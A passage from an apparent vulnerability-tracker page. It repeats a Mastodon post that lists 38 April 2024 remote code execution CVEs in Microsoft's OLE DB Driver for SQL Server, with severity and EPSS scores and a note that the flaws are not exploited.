  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29046
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-10T13:24:00.070000

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28914
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-10T13:24:00.070000

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29982
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-10T13:24:00.070000

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28933
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-10T13:24:00.070000

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
